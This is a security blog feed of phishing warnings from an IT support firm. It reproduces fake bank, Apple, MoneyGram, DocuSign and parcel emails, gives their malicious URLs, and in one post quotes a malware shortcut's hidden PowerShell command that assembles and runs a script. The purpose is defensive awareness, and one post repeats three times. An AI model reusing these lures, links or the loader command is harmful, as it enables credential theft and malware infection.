Your Email Domain Account Notification!! Spam

11. October 2018 16:45 by sirclesadmin in Viruses and Malware threats, SPAM, Phishing

0

Share

Your Email Domain Account Notification!! Spam

This email has been doing the rounds today:

From: YourEmailDomain.com [no-reply@mailserver.com]

Sent: 11 October 2018 02:01

To: Recipient

Subject: YourEmailDomain.com Account Notification!!

Email Security info
Your email name@domain.com has reached an upgrade stage, verify your user email to continue usage,
This is for your own safety to continue using your account, click the button below.

Verify

Note: Please do not ignore this email to avoid your account closure
Thanks,
The security email team.
.

Copyright © 2018 Mail! Inc. (Co. Reg. No. 2344507D) All Rights Reserved. Intellectual Property

The 'verify' link actually points to: https://caravanecafe.ca/mikoko/Qupdate/index.php?email=name@domain.com&browser=unkonown&time=valid which has already been marked as deceptive by the big browsers:

The website itself:

Is fairly convincing looking and I will type them a nice message in the password field commending them on their good work and encouraging them to continue.

The password actually appears to do a lookup of some kind as it reports that it is wrong but perhaps they just want to get as many of your passwords as possible...?

Anyway, stay vigilant and safe!

Tags:

45c7f6bf-4e3f-4c34-8d5f-144fb4d30978|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

We could not reset the password for your AppIe lD - Spam Warning

11. October 2018 16:08 by sirclesadmin in Internet Security, SPAM

0

Share

We could not reset the password for your AppIe lD - Spam Warning

This rather weak spam email uses a PDF to try and hide it's dirty link to a fraudulent website.

The email itself:

Dear AppIe User.

We could not reset the password for your AppIe lD because there were too many failed attempts to answer your security questions.

To read your secure message by opening the attachment(PDF).

You will be prompted to open(view)the file or save(download) it to your computer or device

For best results Save the file , then open it on a web browser.

Your account will be locked if we didn’t receive any response from you in more than twenty four hours

Sincerely,

Apple Support

The Unlock Apple ID link points to:

http://applie-id.veriby.coolambo.ca which is sketchy at best. The website itself is already marked as deceptive by Google and Microsoft and so shouldn't be making too many lives more miserable.

The Apple site impersonation is somewhat more impressive:

And after you type in any email address and password to the unsecured site, it then presents you with:

in which they actually have the audacity to ask for a card number as security.

Hopefully no one will fall for this nonsense, and they will have wasted their time.

Stay vigilant!

Tags:

3923f99f-e96e-4ccc-86bc-9ef9c4ca2c29|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

We could not reset the password for your AppIe lD - Spam Warning

11. October 2018 16:08 by sirclesadmin in Internet Security, SPAM

0

Share

We could not reset the password for your AppIe lD - Spam Warning

This rather weak spam email uses a PDF to try and hide it's dirty link to a fraudulent website.

The email itself:

Dear AppIe User.

We could not reset the password for your AppIe lD because there were too many failed attempts to answer your security questions.

To read your secure message by opening the attachment(PDF).

You will be prompted to open(view)the file or save(download) it to your computer or device

For best results Save the file , then open it on a web browser.

Your account will be locked if we didn’t receive any response from you in more than twenty four hours

Sincerely,

Apple Support

The Unlock Apple ID link points to:

http://applie-id.veriby.coolambo.ca which is sketchy at best. The website itself is already marked as deceptive by Google and Microsoft and so shouldn't be making too many lives more miserable.

The Apple site impersonation is somewhat more impressive:

And after you type in any email address and password to the unsecured site, it then presents you with:

in which they actually have the audacity to ask for a card number and bank account and sort code as security.

Hopefully no one will fall for this nonsense, and they will have wasted their time.

Stay vigilant!

Tags:

8ec51c16-eded-4d7a-9134-df48424ca359|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

We could not reset the password for your AppIe lD - Spam Warning

11. October 2018 16:08 by sirclesadmin in Internet Security, SPAM

0

Share

We could not reset the password for your AppIe lD - Spam Warning

This rather weak spam email uses a PDF to try and hide it's dirty link to a fraudulent website.

The email itself:

Dear AppIe User.

We could not reset the password for your AppIe lD because there were too many failed attempts to answer your security questions.

To read your secure message by opening the attachment(PDF).

You will be prompted to open(view)the file or save(download) it to your computer or device

For best results Save the file , then open it on a web browser.

Your account will be locked if we didn’t receive any response from you in more than twenty four hours

Sincerely,

Apple Support

The Unlock Apple ID link points to:

http://applie-id.veriby.coolambo.ca which is sketchy at best. The website itself is already marked as deceptive by Google and Microsoft and so shouldn't be making too many lives more miserable.

The Apple site impersonation is somewhat more impressive:

And after you type in any email address and password to the unsecured site, it then presents you with:

in which they actually have the audacity to ask for a card number and bank account and sort code as security.

Hopefully no one will fall for this nonsense, and they will have wasted their time.

Stay vigilant!

Tags:

174cedce-2ba5-4407-9c8a-e637845492f0|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

Package(3VKN_270) confirmed: 8 items sent Spam Email

4. September 2018 14:25 by sirclesadmin in Online Fraud, SPAM

0

Share

Package(3VKN_270) confirmed: 8 items sent Spam Email

Watch out for this email:

From: Bessie Daulton <maricela.schoultz@shenandoahbennett.com>

Sent: Tuesday, September 4, 2018 12:39 PM

To: Recipient

Subject: your name, Package(3VKN_270) confirmed: 8 items sent

Dear your name

We are now processsing your order 3VKN_270, please find your order details below:

Shipment Details

Name and Postcode

TOWN
County

Your order details here

This confirmation acts as your guarantee, which begins from the day your product is delivered to you.

Consumer Contracts Regulations 2013 offers the following cancellation rights

Please note that you are entitled to cancel this contract if you so wish, provided that you exercise your right no longer than 14 days after the day on which you receive the goods or services.

Please note that your right to return products does not apply to goods made to your specification, that have been clearly personalised or which by reason of their nature cannot be returned or are liable to deteriorate or expire rapidly.

If you wish to exercise your right of cancellation, you are obliged to retain possession of the goods and take reasonable care of them.

If you decide to cancel, you should return the goods to us at your cost within 14 days of such cancellation and we will reimburse to you (by the method used to pay for the original transaction) the amount in relation to goods to which cancellation rights apply. This includes the cost of delivery (except for the supplementary costs arising if you choose a type of delivery other than our standard and least expensive method of delivery). We may make a deduction from the reimbursement for loss in value of any goods supplied, if the loss is the result of unnecessary handling by you. We will make the reimbursement no later than 14 days after the day we receive back from you any goods supplied.

Returning items

We want you to be happy with your purchase. If you're not, just return the item with proof of purchase and we'll exchange or refund it.

Further information can be found in the customer service section of our website and the dispatch note included with your order. Our usual refund policy does not apply to cut or made to order products or perishable goods, which cannot be returned or exchanged unless faulty.

This does not affect your statutory rights.

Returns can be made using the following options:

	Via our shops: please take this email with you. It shows the prices you paid at the time of your order, and so helps us process your return more quickly and accurately.

Further information on our Terms and Conditions can be found in the Customer Services section of our website, and on the delivery note included with your order.

Do you wish to track your order or require a receipt?

To track the status of your order or print a VAT receipt, if applicable, please click here. You may receive an email from us that will tell you how to track your order as soon as it has been collected for delivery.

Security

We will never ask you to send any personal details via email. If we require such details, for security reasons we will ask you to contact us by phone. Should you receive an email claiming to be from requesting this kind of information, please do not respond to it but do let us know.

Thank you for shopping with us.

Customer Services

Prices are subject to change without prior notification. Products subject to availability, while stocks last. Images are representative only. Errors and omissions excluded.

	Update your details
	Change your preferences

The actual 'Your order details here' link points to: https://assjournal.com/.cabinet/3VKN_270-package-updated which sounds like rather an odd website.

The link will download a command to upload or corrupt your personal data so do not run the command.

The windows shell command will be run on your own documents or downloads folder and may involve blackmail or identity theft.

Be sure to report the originators of this email as well as the website.

Tags:

a0b5abe3-5937-401d-93e2-cbc52c2336a7|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

Upgrade to a more secure banking - Natwest Spam Warning !!

4. September 2018 07:18 by sirclesadmin in Online Fraud, SPAM

0

Share

Upgrade to a more secure banking - Natwest Spam Warning

This email is a typical example of phishing for banking details:

Upgrade to a more secure banking

From: NatWest <info@solidar.es>

Sent: Saturday, September 1, 2018 12:34 PM

To: Recipient

Subject: Upgrade to a more secure banking

Can't see this email? Click here.

Upgrade Now →

Upgrade to a more secure banking

Don’t miss out - last chance to upgrade your account and get £100 instant bonus!

We are regularly changing our online banking system, we will always contact you immediately we notice any issue on your account.

To receive the £100 bonus you are required to update your online information for your security. Please continue below.

Upgrade Now

Stay up to date with our latest news & features

Please do not reply to this email If you wish to unsubscribe click here View our privacy policy

The email is quite well presented - the 'Can't see this email?' question at the top is a good example of how spammers use regulations to sidestep any susupicions we may have about the authenticity of an email.

If you click on the 'can't see this email?' link you are taken to: http://micato.co.uk/wp-admin/includes/036f707f904b5d1f9018d3085a975597/info/login.php?assets.adobedtm.com/5165c8c319825f6ec3fb78d0a8dcc1054ab35a3d/satelliteLib-08b84ffc82250dd93a29554e43774d72e7c1876b.js

It is important to note in the above link the fact that the site is not secure (it begins http and not https) which is an instant and certain indicator that this is not a real banking site.

The site is already labelled by Google as deceptive:

And Microsoft Edge:

The site itself looks similar to Natwest:

But is obviously unsecured and way too slow for a real bank.

Report the originating email and the website as fraudulent and stay vigilant.

Tags:

489b6415-a63e-48f2-b8a5-ddc97863e60d|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

Spam Warning: Payment Message From MoneyGram Systems, Inc

23. August 2018 16:51 by sirclesadmin in Online Fraud, SPAM

0

Share

Spam Warning: Payment Message From MoneyGram Systems, Inc

This email has been spotted:

From: MoneyGram Payment Systems, Inc <moneygram@teamusacargo.com>

Sent: Thursday, August 23, 2018 4:51 PM

To: Recipient

Subject: Payment Message From MoneyGram Systems, Inc

Welcome to MoneyGram!

Here is your new transaction from MoneyGram.

In case you don't have with MoneyGram, click on the link provided below to easily open an account with us and cash out to your banking account .

We look forward to helping to make your future money transfer simple and enjoyable send now!

View your transaction details

Download our App:

Don't respond to this e mail. In case you have further questions, please call us.

Customer Protection

|

Privacy Policy

MoneyGram Payment Systems, Inc.

|

2493 Utica Road E, Stu 100

|

Minneapolis, MN 53712

This message may consist of confidential info. Don't give any information concerning this financial transaction to a third party. If you are not the intended receiver, inform us promptly and erase this e mail from your system.

The link actually points to: http://furnitureforthehometv.com?3le150=QAUSY1CQVUFS1QXOBsGSJTHS with no certificate or security.

The link simply downloads a harmful .DOC file named invoice.doc to your computer - DO NOT OPEN THIS FILE.

Make sure your report the email address moneygram@teamusacargo.com as dangerous, the website http://furnitureforthehometv.com seems to have been deactivated already.

Tags:

58691ac4-2e61-4f45-90e5-3a122fa76608|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

9. August 2018 07:19 by sirclesadmin in Internet Security, Online Fraud, SPAM

0

Share

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

This email has been assembled by sourcing information from your personal history online, in this example they have sourced an old telephone number from somewhere, probably sold to them by our local council.

From: Direct <theo-letran@glampiny.com>

Sent: Thursday, August 9, 2018 6:35 AM

To: Receipent

Subject: Your Name, Pack(50RM_84248) confirmed: 7 items sent

Order Acknowledgment

Dear Your name,

Your order is now confirmed. Thanks for shopping with us!

Billing Address:
Your Name
Your Telephone Number Postcode

Your Order Reference: 50RM_84248
Order Date: 8/9/2018

Delivery Address:
Your Name
Your Telephone Number Postcode

Your Order 50RM_84248 available here

Your right to cancel:

In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase.

To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip.

We recommend that you use a recorded delivery service.

Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount.

As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed.

The hyperlink 'Your Order 50RM_84248 available here' actually links to: https://kocobanana.com/.orderdetails/50RM_84248-confirmation which is presumably a genuine website as it has a certificate but it simply forwards you to: https://support.office.com/office-training-center?wt.mc_id=AID573689_QSG_184686 which is presumably not an association that Microsoft enjoy.

The actual link downloads a zip file:

The contents of the zip file are as follows:

And when extracted, reveal:

The image just being a Google Pay image:

And the shortcut linking to:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -wind hidden -c cd %USERPROFILE%\Documents; findstr /s fildunare ..\*.lnk > desktop.ps1;.\desktop.ps1;exit

As we can see, this is another Windows Powershell command but one which which we cannot make head or tail of - fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.

Either way, it is attempting to find the string fildunare with a .lnk extension in your documents and invokes desktop.ps1 which doesn't actually seem to be included with any version of Windows and so is a bit of a mystery.

Either way, make sure that .ps1 files are blocked inside of attachments, especially archive files, and this will not be an issue.

The originating email domain - glampiny.com - does not seem to be a website either so block that domain from your email server.

Tags: Spam, Personal Details

4b6abdd1-6eeb-43d2-b060-361e7088b403|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

Spam Warning: You've received efax Notice

8. August 2018 07:58 by sirclesadmin in Internet Security, SPAM

0

Share

Spam Warning: You've received efax Notice

We have seen this email throughout this week:

From: eFax j2 Global <efax@ramatmed.com>

Sent: Tuesday, August 7, 2018 7:52 PM

To: Recipient

Subject: You've received efax Notice

Fax Message; ID: 4734 745 7735,

You have got a 6 page(s) fax at 08-07-2018 08:34:55 GMT.

*Your reference number is ek4_pid02-88444959724931-3463741-40.

Visit www.efax.com/efax-help-center if you have any questions relating to this notification.

Get Fax Now

The eFax Team

2002-2018 j2 Global, Inc. and affiliates. All rights reserved.
eFax is a trademark of j2 Global, Inc.
22592 Hollywood Blvd, Los Angeles, CA 98613

*** This is an automatic message, please do not reply directly to this email address *** Privacy Policy.

The 'Get Fax Now' link actually points to: http://hvcrmls.info?82a6yp=QIUBNYQASHUBQYUDP Which appears to have already been removed but the site name is so bizarre, it makes you wonder if it ever existed. I am not going to invest time in looking it up but this email is spam and should be reported.

The sender efax@ramatmed.com has a domain of what appears to be a Los Angeles medial supplier but the website is very spartan.

Tags:

b473f81c-c32f-4a64-ab78-a69c53dd0022|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

Spam Warning: You received notification from DocuSign Signature Service

7. August 2018 06:48 by sirclesadmin in Internet Security, Fraud, Online Fraud, SPAM

0

Share

Spam Warning: You received notification from DocuSign Signature Service

You may see the following email, purportedly from DocuSign. We have seen it being captured by most spam guards but also getting through many on other occasions.

From: DocuSign Signature Service <docusign@pehache.com>

Sent: Monday, August 6, 2018 5:21 PM

To: Recipient

Subject: You received notification from DocuSign Signature Service

Review and sign this document.

VIEW INVOICE

Dear Receiver,

Please review this invoice
It is an automatically generated invoice.

This email contains a secure information. Do not share this code with other people.

Additional Signing Way
Please visit DocuSign.com, click on 'Access Documents', and enter the security code: F80B75BEF7

About Our Service
Sign invoice electronically in just minutes. It's risk-free. Whether you're at work, home or even across the globe -- Our service gives a professional solution for Digital Transaction Management.

Have questions about an Invoice?
In case you need to modify the document or have questions about the details in the document, reach out to the sender directly.

If you are having trouble signing the document, please see the Help with Signing page on our Webpage .

Review Invoice

This message was sent to you by DocuSign Electronic Signature Service.

The 'view invoice' link actually points at: http://keithharenda.com?6d50=QAUSY1CQVUFS1QXOBsGSJTHS which is an unsecured site which appears to have been compromised.

The folder appears to have already been removed.

We have also seen: http://nashvillechildfamilywellness.com?20Yy5=QAUSY1CQVUFS1QXOBsGSJTH S being used by the same email.

The 'review invoice' link at the bottom points to: http://kphbuilds.com?7P62A=QAUSY1CQVUFS1QXOBsGSJTHS which also appears to have been shut down.

Report any senders of this email, the pehache.com domain does not seem to function either.

Tags:

6ae7f950-6956-4ca0-9098-84d673397ba1|1|5.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes